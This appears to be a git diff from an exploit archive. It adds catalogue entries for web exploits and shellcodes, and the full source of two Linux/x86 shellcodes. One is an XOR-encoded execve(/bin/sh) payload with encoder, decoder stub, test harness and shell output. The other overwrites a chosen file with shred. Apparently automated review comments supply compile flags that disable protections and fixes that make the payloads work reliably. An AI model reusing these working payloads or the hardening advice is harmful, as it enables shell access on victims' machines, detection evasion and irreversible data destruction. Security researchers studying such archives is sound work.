6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 
@@ -41224,3 +41228,6 @@ id,file,description,date,author,type,platform,port 46787,exploits/php/webapps/46787.txt,"Instagram Auto Follow - Authentication Bypass",2019-05-03,Veyselxan,webapps,php, 46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple, 46794,exploits/php/webapps/46794.py,"Wordpress Plugin Social Warfare < 3.5.3 - Remote Code Execution",2019-05-03,hash3liZer,webapps,php, +46796,exploits/multiple/webapps/46796.txt,"ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution",2019-05-06,"Gilson Camelo",webapps,multiple, +46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80 +46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 2082791b3..7ed17ea82 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -961,3 +961,5 @@ id,file,description,date,author,type,platform 46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator 46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86 +46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator +46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86 diff --git a/shellcodes/generator/46800.txt b/shellcodes/generator/46800.txt new file mode 100644 index 000000000..4e86fc5b1 --- /dev/null +++ b/shellcodes/generator/46800.txt 
@@ -0,0 +1,139 @@ +# Title: Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) +# Author: Xavi Beltran +# Date: 05/05/2019 +# Contact: xavibeltran@protonmail.com +# Purpose: spawn /bin/sh shell +# Tested On: Ubuntu 3.5.0-17-generic +# Arch: x86 +# Size: 59 bytes + +############################################## sh.nasm ############################################### +global _start +section .text +_start: + xor eax, eax + push eax + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + push eax + mov edx, esp + push ebx + mov ecx, esp + mov al, 11 + int 0x80 + + +###################################### original shellcode ############################################# +\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 + + +################################# encoder-xor-multiple-keys.py ###################################### +#!/usr/bin/python +# Autor: Xavi Beltran +# Date: 05/05/2019 + +shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +encoded = "" +encoded2 = "" + +print 'Encoded shellcode ...' + +i = 1 +for x in bytearray(shellcode) : + + if i == 11: + i = 1 + y = x^i + encoded += '\\x' + encoded += '%02x' % y + + encoded2 += '0x' + encoded2 += '%02x,' %y + + i = i + 0x01 + +print encoded + +print encoded2 + +print 'Len: %d' % len(bytearray(shellcode)) + + +######################################### Encoded Shellcode ############################################### + +socket@ubuntu:~/Assesments/4$ python encoder-xor-multiple-keys.py +Encoded shellcode ... 
+\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85 +0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85, +Len: 25 + + +#################################### decoder-xor-multiple-keys.nasm ############################################### + +; Filename: xor-decoder-multiple-keys.nasm +; Author: Xavi Beltran +; Date: 05/05/2019 + +global _start + +section .text +_start: + + xor edx, edx + mov dl, 1 + jmp short call_decoder + +decoder: + pop esi + xor ecx, ecx + mov cl, 25 + + +decode: + cmp dl, 0x0b + jz xor_counter + xor byte [esi], dl + inc esi + inc dl + loop decode + + jmp short Shellcode + +xor_counter: + mov dl, 1 + jmp decode + +call_decoder: + + call decoder + Shellcode: db 0x30,0xc2,0x53,0x6c,0x2a,0x29,0x74,0x60,0x61,0x25,0x63,0x6b,0x6d,0x8d,0xe6,0x56,0x8e,0xea,0x5a,0x83,0xe0,0xb2,0x08,0xc9,0x85 + + +############################################### final shellcode ################################################ + +socket@ubuntu:~/Assesments/4$ ./objdump_parser.sh decoder-xor-multiple-keys +"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85" +socket@ubuntu:~/Assesments/4$ ./shellcode +Shellcode Length: 59 +$ whoami +socket + +socket@ubuntu:~/Assesments/4$ cat shellcode.c +#include +#include + +unsigned char code[] = \ +"\x31\xd2\xb2\x01\xeb\x17\x5e\x31\xc9\xb1\x19\x80\xfa\x0b\x74\x09\x30\x16\x46\xfe\xc2\xe2\xf4\xeb\x09\xb2\x01\xeb\xee\xe8\xe4\xff\xff\xff\x30\xc2\x53\x6c\x2a\x29\x74\x60\x61\x25\x63\x6b\x6d\x8d\xe6\x56\x8e\xea\x5a\x83\xe0\xb2\x08\xc9\x85"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file 
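Review bot: The decoder's `xor byte [esi], dl` rewrites the encoded bytes in place, so the stub only works when the shellcode sits in a page that is both writable and executable — `shellcode.c` depends on that, but unlike 46801 this entry never gives the compile line, so `gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode` should be added with a note that the in-place XOR is the reason. `main()` with no return type is rejected by current C compilers; `int main(void)` is needed. `Tested On: Ubuntu 3.5.0-17-generic` is a kernel version, not an Ubuntu release, and the key schedule (bytes XORed with 1..10, wrapping at `0x0b`) is worth one sentence of prose since the encoder and decoder must agree on it.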
diff --git a/shellcodes/linux_x86/46801.txt b/shellcodes/linux_x86/46801.txt new file mode 100644 index 000000000..5fcdb180f --- /dev/null +++ b/shellcodes/linux_x86/46801.txt @@ -0,0 +1,76 @@ +# Exploit Title: Linux/x86 shred file (72 bytes) +# Google Dork: None +# Date: 02.05.2019 +# Exploit Author: strider +# Vendor Homepage: None +# Software Link: None +# Tested on: Debian 9 Stretch i386/ Kali Linux i386 +# CVE : None +# Shellcode Length: 72 +------------------------------[Description]--------------------------------- + +This shellcode shred files 64 times + +replace test.txt with any file you want. + +-----------------------------[Shellcode Dump]--------------------------------- +section .text + +global _start + +_start: + xor eax, eax + push eax + + push word 0x6465 + push 0x7268732f + push 0x6e69622f + push 0x7273752f + + mov ebx, esp + jmp short _file + +_params: + pop ecx + mov ebp, ecx + xor ecx, ecx + push eax + push 0x6e7a762d + mov esi, esp + + push eax + push word 0x3436 + xor edx, edx + mov edi, esp + +_exec: + push eax + push ebp + push edi + push esi + push ebx + mov ecx, esp + mov al, 0xb + + int 0x80 + +_file: + call _params + string db "test.txt"; replace test.txt with any file you want + + -----------------------------[Compile]--------------------------------------------- + gcc -m32 -fno-stack-protector -z execstack -o tester tester.c + + -----------------------------[C-Code]----------------------------- + + #include + #include + + unsigned char shellcode[] = "\x31\xc0\x50\x66\x68\x65\x64\x68\x2f\x73\x68\x72\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\xeb\x21\x59\x89\xcd\x31\xc9\x50\x68\x2d\x76\x7a\x6e\x89\xe6\x50\x66\x68\x36\x34\x31\xd2\x89\xe7\x50\x55\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xda\xff\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74"; + void main() + { + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); + } \ No newline at end of file
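Review bot: `string db "test.txt"` is not NUL-terminated, and `_params` hands its address (`ebp`) straight to `execve` as `argv[3]`, so the filename is whatever follows the shellcode in memory up to the first zero byte — the C harness only works because the compiler places a terminating NUL after the `shellcode[]` array. It should be `string db "test.txt", 0`; that makes the blob 73 bytes and introduces a null byte, so callers that need a NUL-free payload must supply the terminator some other way, and the `strlen`-based length print will still report 72. The description should also spell out the argv being built (`/usr/bin/shred -vzn 64 <file>`), which the separate pushes of `-vzn` and `64` only show indirectly.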